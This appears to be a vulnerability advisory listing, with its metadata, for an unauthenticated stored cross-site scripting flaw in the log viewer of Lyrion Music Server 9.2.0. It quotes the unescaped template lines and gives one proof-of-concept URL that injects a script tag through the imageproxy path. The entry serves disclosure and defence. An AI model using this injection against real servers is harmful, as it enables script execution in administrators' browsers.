📄 Lyrion Music Server 9.2.0 server.log Persistent Cross Site Scripting

7.2 / 10

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Description

The log viewer in Lyrion Music Server version 9.2.0 reflects request parameters and raw log content into HTML with no escaping. Any attacker-provided value that gets logged a crafted URL, User-Agent, stream title, player name becomes persistent cross...

Visit Original Source

Basic Information

ID PACKETSTORM:222804

Published Jun 5, 2026 at 00:00

Affected Product

Affected Versions Lyrion Music Server 9.2.0 (server.log) Unauthenticated Stored XSS

Vendor: LMS Community
Product web page: https://www.lyrion.org
Affected version 9.2.0

Summary: Lyrion Music Server (formerly Logitech Media Server, and
often abbreviated as "LMS" ) is open-source software which can control
and serve (stream) music to a wide range of physical and virtual audio
players called Squeezeboxes. Lyrion Music Server can stream your local
music collection, internet radio stations, and content from many streaming
services (with and without subscriptions).

Desc: The log viewer reflects request parameters and raw log content into
HTML with no escaping. Template Toolkit has no global auto-escaping so any
[% var %] without an explicit | html filter is an injection point. The search,
lines and path query parameters are reflected directly, and log lines are
emitted as raw HTML. Any attacker-provided value that gets logged (a crafted
URL, User-Agent, stream title, player name) becomes stored XSS.

============================================================================
/HTML/EN/log.html
-------------------
85: <input type="text" name="search" id="search" value="[% search %]" ...>
98: <span><a href="/[% path %]?zip=1">[% "DOWNLOAD" | string %]</a></span>
100: <input type="hidden" name="lines" id="lines" value="[% lines %]"></input>
103: <pre>[% logLines %]</pre>

/Slim/Web/Pages/Common.pm (logFile)
------------------------------------
508: my $search = $params->{search};
... $line = "<span style=\"color:red\">$line</span>" if ...;
549: return Slim::Web::HTTP::filltemplatefile("log.html", $params);
============================================================================

Tested on: Windows 10 (64-bit) - EN
Lyrion Music Server (9.2.0 - 1779973211)
Perl/5.32.1
SQLite

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience

Advisory ID: ZSL-2026-5989
Advisory URL: https://www.zeroscience.mk/#/advisories/ZSL-2026-5989
CVE ID: CVE-2026-50231
CVE URL: https://www.cve.org/CVERecord?id=CVE-2026-50231

27.05.2026

--

http://localhost:9000/imageproxy/file:////Zero%20Science%20Lab%20is%3Cscript%3Econfirm(%22Awesome!%22)%3C/script%3E

Viewing log at http://localhost:9000/server.log:
...
...
[26-05-29 14:32:44.5987] Slim::Web::ImageProxy::__ANON__ (376) Artwork resize for imageproxy/file:////Zero Science Lab is failed
...

{
    "lastseen": "2026-06-05T18:16:07",
    "description": "The log viewer in Lyrion Music Server version 9.2.0 reflects request parameters and raw log content into HTML with no escaping. Any attacker-provided value that gets logged a crafted URL, User-Agent, stream title, player name becomes persistent cross...",
    "published": "2026-06-05T00:00:00",
    "modified": "2026-06-05T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Lyrion Music Server 9.2.0 server.log Persistent Cross Site Scripting",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:222804",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2026-50231"
    ],
    "sourceData": "Lyrion Music Server 9.2.0 (server.log) Unauthenticated Stored XSS\n    \n    \n    Vendor: LMS Community\n    Product web page: https://www.lyrion.org\n    Affected version 9.2.0\n    \n    Summary: Lyrion Music Server (formerly Logitech Media Server, and\n    often abbreviated as \"LMS\" ) is open-source software which can control\n    and serve (stream) music to a wide range of physical and virtual audio\n    players called Squeezeboxes. Lyrion Music Server can stream your local\n    music collection, internet radio stations, and content from many streaming\n    services (with and without subscriptions).\n    \n    Desc: The log viewer reflects request parameters and raw log content into\n    HTML with no escaping. Template Toolkit has no global auto-escaping so any\n    [% var %] without an explicit | html filter is an injection point. The search,\n    lines and path query parameters are reflected directly, and log lines are\n    emitted as raw HTML. Any attacker-provided value that gets logged (a crafted\n    URL, User-Agent, stream title, player name) becomes stored XSS.\n    \n    ============================================================================\n    /HTML/EN/log.html\n    -------------------\n    85:  <input type=\"text\" name=\"search\" id=\"search\" value=\"[% search %]\" ...>\n    98:  <span><a href=\"/[% path %]?zip=1\">[% \"DOWNLOAD\" | string %]</a></span>\n    100: <input type=\"hidden\" name=\"lines\" id=\"lines\" value=\"[% lines %]\"></input>\n    103: <pre>[% logLines %]</pre>\n    \n    \n    /Slim/Web/Pages/Common.pm  (logFile)\n    ------------------------------------\n    508:  my $search = $params->{search};\n    ...   $line = \"<span style=\\\"color:red\\\">$line</span>\" if ...;\n    549:  return Slim::Web::HTTP::filltemplatefile(\"log.html\", $params);\n    ============================================================================\n    \n    Tested on: Windows 10 (64-bit) - EN\n               Lyrion Music Server (9.2.0 - 1779973211)\n               Perl/5.32.1\n               SQLite\n    \n    \n    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic\n                                @zeroscience\n    \n    \n    Advisory ID: ZSL-2026-5989\n    Advisory URL: https://www.zeroscience.mk/#/advisories/ZSL-2026-5989\n    CVE ID: CVE-2026-50231\n    CVE URL: https://www.cve.org/CVERecord?id=CVE-2026-50231\n    \n    \n    27.05.2026\n    \n    --\n    \n    \n    http://localhost:9000/imageproxy/file:////Zero%20Science%20Lab%20is%3Cscript%3Econfirm(%22Awesome!%22)%3C/script%3E\n    \n    Viewing log at http://localhost:9000/server.log:\n    ...\n    ...\n    [26-05-29 14:32:44.5987] Slim::Web::ImageProxy::__ANON__ (376) Artwork resize for imageproxy/file:////Zero Science Lab is failed\n    ...",
    "sourceHref": "https://packetstorm.news/download/222804",
    "cvss": {
        "score": 7.2,
        "severity": "HIGH",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/222804/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

📄 Lyrion Music Server 9.2.0 server.log Persistent Cross Site Scripting_PACKETSTORM:222804

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply